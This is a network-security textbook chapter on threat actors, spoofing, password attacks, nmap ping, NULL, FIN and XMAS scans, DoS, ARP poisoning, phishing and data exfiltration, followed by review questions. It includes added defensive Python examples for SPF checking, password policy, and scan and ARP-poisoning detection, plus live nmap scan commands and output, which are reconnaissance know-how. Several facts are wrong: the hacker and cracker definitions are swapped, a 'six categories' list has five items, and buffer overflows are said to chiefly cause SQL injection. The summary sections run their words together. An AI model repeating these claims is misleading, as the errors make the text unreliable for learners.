The Federal Bureau of Investigation (FBI) has identified three categories of threat actors.
Organized crime groups primarily threatening the financial services sector and expanding the scope of their attacks
State sponsors, usually foreign governments, interested in pilfering data, including intellectual property and research and development data from major manufacturers, government agencies, and defense contractors
Terrorist groups that want to impact countries by using the Internet and other networks to disrupt or harm the viability of our way of life by damaging our critical infrastructure
While there are other less organized groups out there, these three groups are considered to be the primary threat actors by law enforcement. However, organizations should not totally disregard the threat of any threat actors that fall outside these three categories. Lone actors or smaller groups that use hacking as a means to discover and exploit any discovered vulnerability can cause damage just like the larger, more organized groups.
Hacktivists This includes those who hack not for personal gain but to further a cause. An example is the Anonymous group that hacks from time to time for various political reasons.
Thrill hackers These guys do it for the notoriety. They deface websites and brag about their conquests to their fellow thrill hackers on websites where they share tools and methods.
Hacker and cracker are two terms that are often used interchangeably in media but do not actually have the same meaning. Hackers are individuals who attempt to break into secure systems to obtain knowledge about the systems and possibly use that knowledge to carry out pranks or commit crimes. Crackers, on the other hand, are individuals who attempt to break into secure systems without using the knowledge gained for any nefarious purposes.
In the security world, the terms white hat, gray hat, and black hat are more easily understood and less often confused than the terms hackers and crackers. A white hat does not have any malicious intent. A black hat has malicious intent. A gray hat is considered somewhere in the middle of the two. A gray hat will break into a system, notify the administrator of the security hole, and offer to fix the security issues for a fee.
Classifying Attack Vectors
After assets have been classified with regard to sensitivity and criticality (see Chapter 1), the next step is to identify threats. When determining vulnerabilities and threats to an asset, considering the threat agents first is often easiest. Threat agents can be grouped into the following six categories:
Human includes both malicious and nonmalicious insiders and outsiders, terrorists, spies, and terminated personnel.
Natural includes floods, fires, tornadoes, hurricanes, earthquakes, or other natural disaster or weather event.
Technical includes hardware and software failure, malicious code, and new technologies.
Physical includes CCTV issues, perimeter measures failure, and biometric failure.
Operational includes any process or procedure that can affect CIA.
Examples of the threat actors include both internal and external actors and include the following:
Internal actors
Reckless employee
Untrained employee
Partner
Disgruntled employee
Internal spy
Government spy
Vendor
Thief
External actors
Anarchist
Competitor
Corrupt government official
Data miner
Government cyber warrior
Irrational individual
Legal adversary
Mobster
Activist
Terrorist
Vandal
Spoofing
Spoofing, also referred to as masquerading, occurs when communication from an attacker appears to come from trusted sources. The goal of this type of attack is to obtain access by pretending to be that trusted source. Spoofing can be attempted based on the following:
IP addresses
MAC addresses
Email addresses
Let's look at each one of these types of spoofing.
IP Address Spoofing
IP address spoofing is one of the techniques used by hackers to hide their trail or to masquerade as another computer. The hacker alters the IP address as it appears in the packet. This can sometimes allow the packet to get through an ACL that is based on IP addresses. It also can be used to make a connection to a system that trusts only certain IP addresses or ranges of IP addresses.
MAC Address Spoofing
MAC addresses can also be spoofed and used to get through MAC address filters. These filters are typically applied to control access to wireless access points at layer 2. They can also be used to impersonate another device connected to the same switch. In that scenario, it enables the impersonating device to receive traffic intended for the legitimate device. In Chapters 4 and 5 you will learn about methods to prevent these switch-based attacks.
Email Spoofing
Email spoofing is the process of sending an email that appears to come from one source when it really comes from another. It is made possible by altering the fields of email headers such as From, Return-Path, and Reply-To. Its purpose is to convince the receiver to trust the message and reply to it with some sensitive information that the receiver would not have shared unless it was a trusted message.
Often this is one step in an attack designed to harvest usernames and passwords for banking or financial sites. This attack can be mitigated in several ways. One is SMTP authentication, which, when enabled, disallows the sending of an email by a user who cannot authenticate with the sending server.
Another possible mitigation technique is to implement the Sender Policy Framework (SPF). SPF is an email validation system that works by using DNS to determine whether an email sent by someone has been sent by a host sanctioned by that domain's administrator. If it can't be validated, it is not delivered to the recipient's box.
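How a receiving mail server uses SPF to decide whether the connecting host is sanctioned by the sender's domain, as an added example that is not part of the book and is not a full RFC 7208 implementation. The DNS TXT records and domain names are a constructed in-memory table standing in for live lookups, and only the ip4, ip6, include, and all mechanisms are handled.

```python
"""Simplified SPF check: is the connecting host sanctioned by the sender's domain?

Added example, not the book's code. Real SPF (RFC 7208) is evaluated against
live DNS TXT records; here the records are a constructed in-memory table,
and only the ip4, ip6, include and all mechanisms are implemented.
"""
import ipaddress

# Constructed DNS TXT records standing in for real lookups (assumption).
FAKE_DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailprovider.example -all",
    "_spf.mailprovider.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "nospf.example": "",                      # domain publishes no SPF record
}

# Qualifier prefix -> SPF result when the mechanism matches.
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(sender_ip: str, domain: str, dns=FAKE_DNS_TXT, depth: int = 0) -> str:
    """Return pass / fail / softfail / neutral / none for sender_ip sending as domain."""
    if depth > 10:                  # RFC 7208 caps include recursion; treat excess as permerror
        return "permerror"
    record = dns.get(domain, "")
    if not record.startswith("v=spf1"):
        return "none"               # no policy published: receiver cannot validate
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        matched = False
        if name in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            matched = ip.version == net.version and ip in net
        elif name == "include":
            # include matches only when the referenced domain's policy returns pass
            matched = check_spf(sender_ip, arg, dns, depth + 1) == "pass"
        elif name == "all":
            matched = True
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                # no mechanism matched and no 'all' term


def should_deliver(sender_ip: str, mail_from_domain: str, dns=FAKE_DNS_TXT) -> bool:
    """Receiver policy assumed here: reject only hard SPF failures."""
    return check_spf(sender_ip, mail_from_domain, dns) != "fail"


if __name__ == "__main__":
    for ip in ("192.0.2.25", "198.51.100.10", "203.0.113.7"):
        result = check_spf(ip, "example.com")
        print(f"{ip:<16} MAIL FROM example.com -> {result:<8} "
              f"deliver={should_deliver(ip, 'example.com')}")
```

The third address matches no mechanism and falls through to the domain's `-all`, which is the hard fail that causes the message to be refused; a domain that ends its record with `~all` instead only softfails, and a domain with no record at all yields `none`, so SPF protects only domains that actually publish a policy.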
Password Attacks
A password attack is one that attempts to discover user passwords. The two most popular password threats are dictionary attacks and brute-force attacks.
The best countermeasures against password threats are to implement complex password policies, require users to change passwords on a regular basis, employ account lockout policies, encrypt password files, and use password-cracking tools to discover weak passwords.
Dictionary Attack
A dictionary attack occurs when attackers use a dictionary of common words to discover passwords. An automated program uses the hash of the dictionary word and compares this hash value to entries in the system password file. Although the program comes with a dictionary, attackers also use extra dictionaries that are found on the Internet.
You should implement a security rule that says that a password must not be a word found in the dictionary to protect against these attacks.
Brute-Force Attack
Brute-force attacks are more difficult to carry out because they work through all possible combinations of numbers and characters. A brute-force attack is also referred to as an exhaustive attack. It carries out password searches until a correct password is found. These attacks are also very time-consuming.
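The countermeasures listed above (a dictionary rule, a complexity policy, and account lockout) implemented as checks, as an added example that is not from the book. The word list is a small constructed sample; a real deployment would load a full dictionary and a breached-password list. The keyspace function shows why length and character classes matter against an exhaustive search.

```python
"""Password policy checks that blunt dictionary and brute-force attacks.

Added example, not from the book. The word list is a small constructed
sample; a real deployment would load a large dictionary and a breached-
password list.
"""
import math
import string

# Constructed dictionary sample (assumption: a real list would be far larger).
DICTIONARY = {"password", "welcome", "summer", "dragon", "letmein", "qwerty"}

# Substitutions that dictionary-attack rule sets routinely undo, e.g. p@ssw0rd.
LEET = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e", "$": "s", "5": "s", "!": "i"})


def dictionary_hit(password: str, words=DICTIONARY) -> bool:
    """True if the password is a dictionary word, possibly with digits/symbols
    tacked on the ends or leet-style substitutions applied."""
    base = password.lower().strip(string.digits + string.punctuation).translate(LEET)
    return base in words


def charset_size(password: str) -> int:
    """Size of the alphabet a brute-force attacker must assume for this password."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)
    return size


def brute_force_guesses(password: str) -> int:
    """Worst-case guesses for an exhaustive search over the assumed alphabet."""
    return charset_size(password) ** len(password)


def check_policy(password: str, min_length: int = 12, min_classes: int = 3) -> list:
    """Return the list of policy violations (empty list means the password is acceptable)."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    classes = sum([
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(c in string.punctuation for c in password),
    ])
    if classes < min_classes:
        problems.append(f"uses {classes} character classes, policy requires {min_classes}")
    if dictionary_hit(password):
        problems.append("based on a dictionary word")
    return problems


class LockoutPolicy:
    """Account lockout: after `threshold` consecutive failures the account is locked."""

    def __init__(self, threshold: int = 5):
        self.threshold = threshold
        self.failures = {}
        self.locked = set()

    def record_failure(self, user: str) -> bool:
        """Register a failed login; returns True once the account is locked."""
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return user in self.locked

    def is_locked(self, user: str) -> bool:
        return user in self.locked


if __name__ == "__main__":
    for pw in ("P@ssw0rd123!", "Summer2024", "g7#Lq!z9Wv2&Tr"):
        guesses = brute_force_guesses(pw)
        print(f"{pw:<16} problems={check_policy(pw) or 'none'} "
              f"worst-case guesses={guesses:.2e} (~{math.log2(guesses):.0f} bits)")
```

Note that `P@ssw0rd123!` satisfies every complexity rule and still fails, because the dictionary check strips the trailing digits and symbol and undoes the substitutions before comparing; complexity rules alone do not stop a dictionary attack that applies the same transformations.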
Reconnaissance Attacks
Reconnaissance attacks are carried out to gather information about the organizational network as a prelude to a larger attack. It is also sometimes called fingerprinting the network. It is the first step that a penetration tester will take because it mimics the first step of a real attacker. There are several ways in which information can be gathered about the network topology. Let's take a look at the three most common.
Ping Scans
Ping scans involve identifying the live hosts on a network or in a domain name space. Nmap and other scanning tools (ScanLine, SuperScan) can be used for this. It records responses to pings sent to every address in the network. It can also be combined with a port scan by using the proper arguments to the command.
To execute this scan from nmap, the command is nmap -sP 192.168.0.0-100 (0-100 is the range of IP addresses to be scanned in the 192.168.0.0 network). Figure 2.1 shows an example of the output. All devices that are on will be listed. For each the MAC address will also be listed.
FIGURE 2.1 Ping scan with nmap
Port Scans
As operating systems have well-known vulnerabilities, so do common services. By determining the services that are running on a system, the attacker also discovers potential vulnerabilities of the service of which he may attempt to take advantage. This is typically done with port scans in which all "open" or "listening" ports are identified. Once again, the lion's share of these issues will have been mitigated with the proper security patches, but that is not always the case, and it is not uncommon for security analysts to find that systems that are running vulnerable services are missing the relevant security patches. Consequently, when performing service discovery, patches should be checked on systems found to have open ports. It is also advisable to close any ports not required for the system to do its job.
Nmap is one of the most popular port scanning tools used today. By performing scans with certain flags set in the scan packets, security analysts (and hackers) can make certain assumptions based on the responses received. These flags are used to control the TCP connection process, so they are present only in those packets. Figure 2.2 shows a TCP header. The flags of which I speak are circled. Normally the flags that are "turned on" will be done as a result of the normal TCP process, but a hacker can craft packets with the flags checked that the hacker desires.
FIGURE 2.2 TCP header
These are the flags shown:
URG: Urgent pointer field significant
ACK: Acknowledgment field significant
PSH: Push function
RST: Reset the connection
SYN: Synchronize sequence numbers
FIN: No more data from sender
Nmap exploits weaknesses with three scan types.
A NULL scan is a series of TCP packets that contain a sequence number of 0 and no set flags. Because the NULL scan does not contain any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with particular flags. When this packet is sent, these responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.
Figure 2.3 shows the result of this scan using the command nmap -sN. In this case, nmap is unable to determine whether the port is open or closed because there was no response: a silent port may be open, or a firewall may be dropping the probe. That's why they are listed as open|filtered.
FIGURE 2.3 NULL scan
A FIN scan sets the FIN bit. When this packet is sent, these responses are possible:
No response: The port is open on the target.
RST/ACK: The port is closed on the target.
The following is sample output of this scan using the command nmap -sF. I added -v for verbose output. Again, in this case, nmap is unable to determine whether the port is open or closed because there was no response: the port may be closed, or the firewall may be blocking the port. That's why they are listed as open|filtered.
# nmap -sF -v 192.168.0.7
Starting nmap 3.81 at 2016-01-23 21:17 EDT
Initiating FIN Scan against 192.168.0.7 [1663 ports] at 21:17
The FIN Scan took 1.51s to scan 1663 total ports.
Host 192.168.0.7 appears to be up ... good.
Interesting ports on 192.168.0.7:
(The 1654 ports scanned but not shown below are in state: closed)
PORT     STATE         SERVICE
21/tcp   open|filtered ftp
22/tcp   open|filtered ssh
23/tcp   open|filtered telnet
79/tcp   open|filtered finger
110/tcp  open|filtered pop3
111/tcp  open|filtered rpcbind
514/tcp  open|filtered shell
886/tcp  open|filtered unknown
2049/tcp open|filtered nfs
MAC Address: 00:03:47:6D:28:D7 (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 2.276 seconds
Raw packets sent: 1674 (66.9KB) | Rcvd: 1655 (76.1KB)
An XMAS scan sets the FIN, PSH, and URG flags. When this packet is sent, these responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.
Figure 2.4 shows the result of this scan using the command nmap -sX. In this case, too, nmap is unable to determine whether the port is open or closed because there was no response, so the ports are listed as open|filtered.
FIGURE 2.4 XMAS scan
These three scans (NULL, FIN, and XMAS) all serve the same purpose (to discover open ports and ports blocked by a firewall) and differ only in the switch used. While there are many more scan types and attacks that can be launched with this tool, these scan types are commonly used during environmental reconnaissance testing to discover what the hacker might discover before the hacker does and take steps to close any gaps in security.
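The flag bits described above and the three probe shapes they produce, decoded from raw TCP headers, as an added example that is not from the book or from nmap. It is written from the detection side: the packets are constructed 20-byte TCP headers (flag byte at offset 13), the classifier names the probe a packet belongs to, and the response table reproduces the open|filtered versus closed inference the text explains. The port numbers and sequence numbers are constructed.

```python
"""Decode TCP header flags and recognise the NULL/FIN/XMAS probes the book describes.

Added example, not from the book or nmap. The packets below are constructed
TCP headers (20 bytes, no options); the flag byte is at offset 13 per RFC 793.
"""
import struct

# Bit positions of the six classic flags in the TCP header flag byte.
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Flag combinations that never occur in a normal TCP conversation.
PROBE_SIGNATURES = {
    frozenset(): "NULL scan (nmap -sN)",
    frozenset({"FIN"}): "FIN scan (nmap -sF)",
    frozenset({"FIN", "PSH", "URG"}): "XMAS scan (nmap -sX)",
}


def build_tcp_header(sport: int, dport: int, seq: int, flags: set) -> bytes:
    """Construct a minimal TCP header (no options) with the given flags set."""
    flag_byte = sum(FLAG_BITS[f] for f in flags)
    data_offset = 5 << 4               # 5 x 32-bit words, no options
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, data_offset, flag_byte, 8192, 0, 0)


def parse_flags(tcp_header: bytes) -> set:
    """Return the set of flag names set in a raw TCP header."""
    if len(tcp_header) < 20:
        raise ValueError("truncated TCP header")
    flag_byte = tcp_header[13]
    return {name for name, bit in FLAG_BITS.items() if flag_byte & bit}


def classify_probe(tcp_header: bytes) -> str:
    """Name the stealth scan a packet belongs to, or 'normal' for ordinary TCP traffic."""
    flags = frozenset(parse_flags(tcp_header))
    return PROBE_SIGNATURES.get(flags, "normal")


def interpret_response(scan: str, response_flags) -> str:
    """Port state an analyst infers from the target's reply to a NULL/FIN/XMAS probe."""
    if response_flags is None:
        return "open|filtered"   # silence: open port, or a firewall dropped the probe
    if "RST" in response_flags:
        return "closed"
    return "unknown"


def scan_packets_for_probes(packets: list) -> list:
    """Detection logic: return (index, description) for every probe-shaped packet."""
    return [(i, classify_probe(p)) for i, p in enumerate(packets)
            if classify_probe(p) != "normal"]


# Constructed traffic sample: a normal handshake start, three probes, and a SYN/ACK.
SAMPLE_PACKETS = [
    build_tcp_header(51234, 80, 1000, {"SYN"}),
    build_tcp_header(51235, 22, 0, set()),
    build_tcp_header(51236, 21, 0, {"FIN"}),
    build_tcp_header(51237, 23, 0, {"FIN", "PSH", "URG"}),
    build_tcp_header(80, 51234, 2000, {"SYN", "ACK"}),
]

if __name__ == "__main__":
    for i, desc in scan_packets_for_probes(SAMPLE_PACKETS):
        print(f"packet {i}: {desc}; silence from the target would mean "
              f"{interpret_response(desc, None)}")
```

A sensor that applies `classify_probe` to inbound segments catches all three scans with one rule, because what they share (a flag combination no real TCP stack sends to open a connection) is exactly what makes them useful for slipping past flag-based filters.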
OS Fingerprinting
Operating system fingerprinting is simply the process of using some method to determine the operating system running on a host or a server. Its value to the hacker is that by identifying the OS version and build number, common vulnerabilities of that operating system can be identified using readily available documentation from the Internet. While many of the issues will have been addressed in subsequent service packs and hotfixes, there might be zero-day weaknesses (those that have not been widely publicized or addressed by the vendor) the hacker may be able to leverage in the attack. Moreover, if any of the relevant security patches have not been applied, the weaknesses the patch was intended to address will exist on the machine. Therefore, the purpose of attempting OS fingerprinting during assessment is to assess the relative ease with which it can be done and identify methods to make it more difficult.
Buffer Overflow
Buffers are portions of system memory that are used to store information. A buffer overflow is an attack that occurs when the amount of data that is submitted to a buffer is larger than the buffer can handle. Typically, this type of attack is possible because of poorly written application or operating system code. This can result in an injection of malicious code, primarily either a denial-of-service attack or a SQL injection.
To protect against this issue, organizations should ensure that all operating systems and applications are updated with the latest service packs and patches. In addition, programmers should properly test all applications to check for overflow conditions. Hackers can take advantage of this phenomenon by submitting too much data, which can cause an error or in some cases execute commands on the machine if the hacker can locate an area where commands can be executed. Not all attacks are designed to execute commands. An attack may just lock the computer as in a DoS attack.
With proper input validation, a buffer overflow attack will cause an access violation. Without proper input validation, the allocated space will be exceeded, and the data at the bottom of the memory stack will be overwritten. The key to preventing many buffer overflow attacks is input validation, in which any input is checked for format and length before it is used. Buffer overflows and boundary errors (when input exceeds the boundaries allotted for the input) are a family of error conditions called input validation errors.
DoS
A denial-of-service (DoS) attack occurs when attackers flood a device with enough requests to degrade the performance of the targeted device. Some popular DoS attacks include SYN floods, pings of death, and smurf attacks. Let's explore how these attacks work.
TCP SYN Flood
To understand a TCP SYN flood attack, you must understand the three-way TCP handshake, which occurs whenever a TCP connection is made. Figure 2.5 displays the process.
FIGURE 2.5 TCP handshake
One important fact not evident in the figure is that when the recipient of the initial SYN packet receives that packet and responds by sending a SYN/ACK packet, it will reserve a small piece of memory for the expected response (ACK). In the attack the attacker sends thousands of these SYN packets and never answers the SYN/ACK packets with an ACK packet. At some point, the recipient will fill up its memory, reserving space for the responses that never come. Then the target will be unable to do anything, which is the denial of service. Figure 2.6 shows the attack. At the point in the diagram where it says TCP Queue Full, the target memory is full.
FIGURE 2.6 SYN flood
Ping of Death
A ping of death is when an oversized ICMP packet is sent to the target. The maximum allowable IP packet size is 65,535 bytes, including the packet header, which is typically 20 bytes. An ICMP echo request is an IP packet with a pseudo header, which is 8 bytes. Therefore, the maximum allowable size of the data area of an ICMP echo request is 65,507 bytes (65,535 – 20 – 8 = 65,507).
A grossly oversized ICMP packet can trigger a range of adverse system reactions such as DoS, crashing, freezing, and rebooting. Figure 2.7 shows such a packet. The packet will be fragmented en route, and when the target attempts to reassemble the packet, it will crash some systems.
FIGURE 2.7 Ping-of-death packet
DDoS
A distributed DoS (DDoS) attack is a DoS attack that is carried out from multiple attack locations. Vulnerable devices are infected with software agents, called zombies. This turns the vulnerable devices into botnets, which then carry out the attack.
Because of the distributed nature of the attack, identifying all the attacking botnets is virtually impossible. The botnets also help to hide the original source of the attack. These attacks can be direct, reflected, and amplified. Let's look at examples of each.
Direct DDoS
In a direct DDoS attack, the attacker launches the attack by sending the attack signal to the handlers, which in turn signal the zombies to attack, as shown in Figure 2.8. The attack is greatly amplified by the use of the zombies. So, a direct attack is also an amplified attack.
FIGURE 2.8 Direct DDoS
Reflection
In a reflected DDoS attack, the attack is bounced off a large number of devices without actually recruiting the devices as zombies. A good example of the reflection type of DDoS is the smurf attack. In the smurf attack, the attacker sends an ICMP packet to the broadcast address of the network in which the target resides. However, the hacker creates this ICMP packet with a spoofed source address, and that spoofed address is that of the target. When every device in the network answers the ping requests, the answers will go to the target. Typically, the hacker will set the number of pings to a very high number so that this continues for some time and uses all the resources of the web server, as shown in Figure 2.9.
FIGURE 2.9 Smurf attack
Man-in-the-Middle Attack
A man-in-the-middle (MITM) attack is when an active attacker listens to the communication between two communicators and changes the contents of this communication. While performing this attack, the attacker pretends to be one of the parties to the other party. The most common type of MITM attack is done at layer 2 and uses the technique described in the next attack to pollute the ARP cache of the targets.
ARP Poisoning
One of the ways a man-in-the-middle attack is accomplished is by poisoning the ARP cache on a switch. The attacker accomplishes this ARP poisoning by answering ARP requests for another computer's IP address with their own MAC address. Once the ARP cache has been successfully poisoned, when ARP resolution occurs, both computers will have the attacker's MAC address listed as the MAC address that maps to the other computer's IP address. As a result, both are sending to the attacker, placing the attacker "in the middle."
Two mitigation techniques are available for preventing ARP poisoning on a Cisco switch.
Dynamic ARP Inspection (DAI)
This security feature intercepts all ARP requests and responses and compares each response's MAC address and IP address information against the MAC–IP bindings contained in a trusted binding table. This table is built by also monitoring all DHCP requests for IP addresses and maintaining the mapping of each resulting IP address to a MAC address (which is part of DHCP snooping). If an incorrect mapping is attempted, the switch rejects the packet.
DHCP Snooping
The main purpose of DHCP snooping is to prevent a poisoning attack on the DHCP database. This is not a switch attack per se, but one of its features can support DAI. It creates a mapping of IP addresses to MAC addresses from a trusted DHCP server that can be used in the validation process of DAI.
You must implement both DAI and DHCP snooping because DAI depends on DHCP snooping. Both configurations will be covered in Chapter 6.
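The dependency between the two features, DHCP snooping building the binding table and DAI consulting it, in miniature, as an added example that is not Cisco's implementation and not from the book. The DHCP acknowledgments, ARP replies, MAC and IP addresses, and port names are all constructed; the logic follows the description above: leases are learned only from a trusted port, and an ARP reply on an untrusted port is dropped when its sender MAC does not own the IP it answers for.

```python
"""DHCP snooping binding table feeding Dynamic ARP Inspection, in miniature.

Added example, not Cisco's implementation. The DHCP and ARP messages below
are constructed, as are the port names; the logic mirrors what the book
describes: DHCP snooping records IP-to-MAC bindings learned from a trusted
server, and DAI drops ARP replies on untrusted ports that contradict them.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class DhcpAck:
    port: str          # switch port the DHCPACK arrived on
    client_mac: str
    assigned_ip: str


@dataclass(frozen=True)
class ArpReply:
    port: str          # switch port the reply arrived on
    sender_mac: str    # "this MAC ..."
    sender_ip: str     # "... answers for this IP"


class DhcpSnooping:
    """Learns IP/MAC bindings only from DHCP servers on trusted ports."""

    def __init__(self, trusted_ports: set):
        self.trusted_ports = set(trusted_ports)
        self.bindings = {}             # ip -> (mac, port)

    def observe(self, ack: DhcpAck) -> bool:
        """Accept the lease into the table only if it came from a trusted port."""
        if ack.port not in self.trusted_ports:
            return False               # rogue DHCP server on an access port: ignored
        self.bindings[ack.assigned_ip] = (ack.client_mac.lower(), ack.port)
        return True


class DynamicArpInspection:
    """Validates ARP replies on untrusted ports against the snooping table."""

    def __init__(self, snooping: DhcpSnooping, trusted_ports: set):
        self.snooping = snooping
        self.trusted_ports = set(trusted_ports)

    def inspect(self, reply: ArpReply) -> tuple:
        """Return (permit?, reason) for one ARP reply."""
        if reply.port in self.trusted_ports:
            return True, "trusted port, not inspected"
        binding = self.snooping.bindings.get(reply.sender_ip)
        if binding is None:
            return False, "no DHCP binding for sender IP"
        mac, _port = binding
        if mac != reply.sender_mac.lower():
            return False, f"MAC {reply.sender_mac} does not own {reply.sender_ip} (binding says {mac})"
        return True, "matches DHCP snooping binding"


def run_demo() -> list:
    """Constructed scenario: two clients get leases, then a poisoning attempt is inspected."""
    uplink = {"Gi1/0/24"}              # constructed name: port toward the real DHCP server
    snoop = DhcpSnooping(trusted_ports=uplink)
    dai = DynamicArpInspection(snoop, trusted_ports=uplink)
    for ack in (
        DhcpAck("Gi1/0/24", "aa:aa:aa:aa:aa:01", "10.0.0.11"),   # lease for host A
        DhcpAck("Gi1/0/24", "aa:aa:aa:aa:aa:02", "10.0.0.12"),   # lease for host B
        DhcpAck("Gi1/0/3", "cc:cc:cc:cc:cc:99", "10.0.0.13"),    # rogue server: ignored
    ):
        snoop.observe(ack)
    replies = [
        ArpReply("Gi1/0/1", "aa:aa:aa:aa:aa:01", "10.0.0.11"),   # host A answering for itself
        ArpReply("Gi1/0/3", "cc:cc:cc:cc:cc:99", "10.0.0.11"),   # another MAC claiming host A's IP
        ArpReply("Gi1/0/3", "cc:cc:cc:cc:cc:99", "10.0.0.13"),   # IP with no trusted lease
    ]
    return [dai.inspect(r) for r in replies]


if __name__ == "__main__":
    for permitted, reason in run_demo():
        print("PERMIT" if permitted else "DROP  ", reason)
```

The third reply shows why the two features must be enabled together: with no trusted lease for that IP, DAI has nothing to compare against and drops the packet, so a host with a static address needs a manual binding or DAI will block its ARP traffic as well.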
Social Engineering
Social engineering attacks occur when attackers use believable language and user gullibility to obtain user credentials or some other confidential information. In this section we are going to focus our attention on a social engineering attack that has been in the news quite a bit lately: phishing.
Phishing/Pharming
Phishing is a social engineering attack in which attackers try to learn personal information, including credit card information and financial data. This type of attack is usually carried out by implementing a fake website that very closely resembles a legitimate website. Users enter data, including credentials, on the fake website, allowing the attackers to capture any information entered. Spear phishing is a phishing attack carried out against a specific target by learning about the target's habits and likes. Spear phishing attacks take longer to carry out than phishing attacks because of the information that must be gathered.
Pharming is similar to phishing, but pharming actually pollutes the contents of a computer's DNS cache so that requests to a legitimate site are actually routed to an alternate site.
Prevention
The best countermeasure against social engineering threats is to provide user security awareness training. This training should be required and must occur on a regular basis because social engineering techniques evolve constantly.
Caution users against using any links embedded in e-mail messages, even if the message appears to have come from a legitimate entity. Users should also review the address bar any time they access a site where their personal information is required to ensure that the site is correct and that SSL is being used, which is indicated by an HTTPS designation at the beginning of the URL address.
Malware
Malicious software, also called malware, is any software that is designed to perform malicious acts. The following are the four classes of malware you should understand:
Virus Any malware that attaches itself to another application to replicate or distribute itself
Worm Any malware that replicates itself, meaning that it does not need another application or human interaction to propagate
Trojan Horse Any malware that disguises itself as a needed application while carrying out malicious actions
Spyware Any malware that collects private user data, including browsing history or keyboard input
The best defense against malicious software is to implement antivirus and anti-malware software. Today most vendors package these two types of software in the same package. Keeping antivirus and anti-malware software up-to-date is vital. This includes ensuring that the latest virus and malware definitions are installed.
Data Loss and Exfiltration
Data exfiltration is the unauthorized transfer of data from a computer or from a storage device. At its most serious level, it is the ultimate goal of advanced persistent threats (APTs), which are those that continue on a long-term basis and are carried out by highly skilled cybercriminals. These groups are not interested in the vacation photos of the receptionist. They are interested in three types of data that they can monetize. Let's look at these data types.
IP
Intellectual property is property that is considered to be a unique creation of the mind and includes books, music, logos, inventions, and slogans. These items can be protected by copyrights, patents, trademarks, and registrations. However, it also includes things that cannot be protected with these mechanisms such as organizational plans, formulas, recipes, customer lists, and other types of data that cannot be disclosed because it might eliminate or reduce the effectiveness of a business advantage. Attack vectors for IP include disgruntled employees, competitors performing corporate espionage, and inadvertent releases through social media.
PII
Personally identifiable information (PII) is any piece of data that can be used alone or with other information to identify a single person. Any PII that an organization collects must be protected in the strongest manner possible. PII includes full name, identification numbers (including driver's license number and Social Security number), date of birth, place of birth, biometric data, financial account numbers (both bank account and credit card numbers), and digital identities (including social media names and tags).
Keep in mind that different countries and levels of government can have different qualifiers for identifying PII. Security professionals must ensure that they understand international, national, state, and local regulations and laws regarding PII. As the theft of this data becomes even more prevalent, you can expect more laws to be enacted that will affect your job.
Credit Card
While PII can be used to perform identity theft, stealing credit card information provides a much quicker path to monetizing malicious activities. Many of the most high-profile data breaches have involved the harvesting of thousands of credit card numbers and the related information that makes them usable. When an organization suffers this type of disclosure, it hurts their reputation because they must inform every user whose data was disclosed. They will also be responsible for any harm suffered by the disclosure, so this is a real nightmare when it occurs. The best mitigation for this is to adopt all recommendations of the Payment Card Industry Data Security Standard (PCI-DSS).
SummaryThischaptercoveredcommonnetworkattacksandtheirmotivations.Italsodiscussedvariousattackvectors,suchasmaliciousandnonmaliciousinsidersandoutsiders,terrorists,spies,andterminatedpersonnel.Thechapteralsolookedatvariousmethodsusedtoperformnetworkreconnaissance,suchaspingscansandportscans.Finally,thechaptercoveredtypesofmalwareandtheexfiltrationofsensitivedatasuchasIP,PII,andcreditcarddata.
ExamEssentialsDescribeattackmotivations.Theseincludefinancialgain,disruption,geopoliticalchange,andnotoriety.Theymaybeattemptedbyorganizedcrimegroups,statesponsors,terroristgroups,hacktivists,andthrillhackers.
Identifycommonnetworkattacks.TheseincludebutarenotlimitedtoIPaddressspoofing,MACaddressspoofing,andemailspoofing.Theyalsoincludepasswordattackssuchasdictionaryandbrute-forceattacks.Finally,explainreconnaissanceattackssuchaspingscans,portscans,andSYNscans.
Explainsocialengineeringattacks.Describephishingandpharmingattacksandhowtheseattackscanleadtomalwaresuchasviruses,worms,andTrojanhorses.
Definethetypesofinformationmostsusceptibletodataexfiltration.Theseincludepersonallyidentifiableinformation(PII),intellectualproperty,andcreditcardinformation.Provideexamplesforeachtypeofdata.
ReviewQuestions
1. What is the typical motivation of a hacktivist?
A. Financial gain
B. Disruption
C. Geopolitical change
D. Notoriety
2. Which of the following attacks has as its goal to get through an ACL on a router?
A. IP address spoofing
B. MAC address spoofing
C. Email spoofing
D. Buffer overflow
3. Which of the following is not a form of password attack?
A. Brute force
B. Dictionary
C. Port scan
D. Social engineering
4. When executing a NULL scan, which response indicates the port is closed on the target?
A. No response
B. Destination unreachable
C. RST
D. ACK
5. Which of the following is a measure used to prevent buffer overflows?
A. Input validation
B. Multifactor authentication
C. Complex passwords
D. Sensitivity labels
6. Which of the following is not a DDoS attack?
A. SYN flood
B. Ping of death
C. Smurf attack
D. Man-in-the-middle
7. Which of the following is typically used to set up a man-in-the-middle attack?
A. ARP poisoning
B. Dynamic ARP inspection
C. Rogue switches
D. MAC overflow
8. Which of the following is mitigation for ARP poisoning?
A. Input validation
B. DAI
C. Multifactor authentication
D. Root guard
9. Which of the following must be implemented to use DAI?
A. DTP
B. Authenticated ARP
